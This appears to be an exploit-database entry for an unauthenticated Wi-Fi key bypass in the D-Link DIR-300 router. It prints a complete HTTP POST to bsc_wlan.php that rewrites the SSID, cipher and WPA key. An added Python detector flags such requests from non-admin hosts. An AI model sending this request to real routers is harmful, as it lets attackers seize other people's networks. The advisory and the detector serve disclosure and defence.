D-Link DIR-300 - WiFi Key Security Bypass

Author: Gaurav Saha
type: remote
platform: hardware
port: 
date_added: 2010-11-24 
date_updated: 2014-10-20 
verified: 1 
codes: OSVDB-75178 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/45038/info

The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.

Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks.

POST http://www.example.com/bsc_wlan.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000

ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=
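
A defender-side check for the request shown above, as an added example that is not part of the original advisory: it flags POSTs to bsc_wlan.php carrying ACTION_POST=final from hosts outside an admin allowlist, and records the key length rather than the key. The allowlist address, the name inspect_request and the sample request are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Assumption: the only hosts that should ever change router settings.
ADMIN_HOSTS = {ipaddress.ip_address("192.168.0.10")}
# Form fields from the request on this page that change Wi-Fi security.
SENSITIVE = ("f_ssid", "f_authentication", "f_cipher", "f_wpa_psk")

# Constructed sample capture (not taken from a real device).
SAMPLE = (
    "POST /bsc_wlan.php HTTP/1.1\r\n"
    "Host: router.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "ACTION_POST=final&f_ssid=HomeNet&f_authentication=7&f_cipher=2"
    "&f_wpa_psk=constructed-key-123"
)


def inspect_request(src_ip, raw):
    """Return a finding if raw is a Wi-Fi settings change from a non-admin host."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return None
    # The target may be absolute-form (proxy capture) or origin-form.
    if not urlsplit(request_line[1]).path.endswith("/bsc_wlan.php"):
        return None
    form = parse_qs(body.strip(), keep_blank_values=True)
    if form.get("ACTION_POST") != ["final"]:
        return None  # not a committed settings change
    if ipaddress.ip_address(src_ip) in ADMIN_HOSTS:
        return None  # expected administrative source
    changed = [f for f in SENSITIVE if form.get(f, [""])[0]]
    return {
        "src": src_ip,
        "fields": changed,
        # Never copy the key itself into an alert; record only its length.
        "psk_len": len(form.get("f_wpa_psk", [""])[0]),
    }


if __name__ == "__main__":
    print(inspect_request("192.168.0.77", SAMPLE))
```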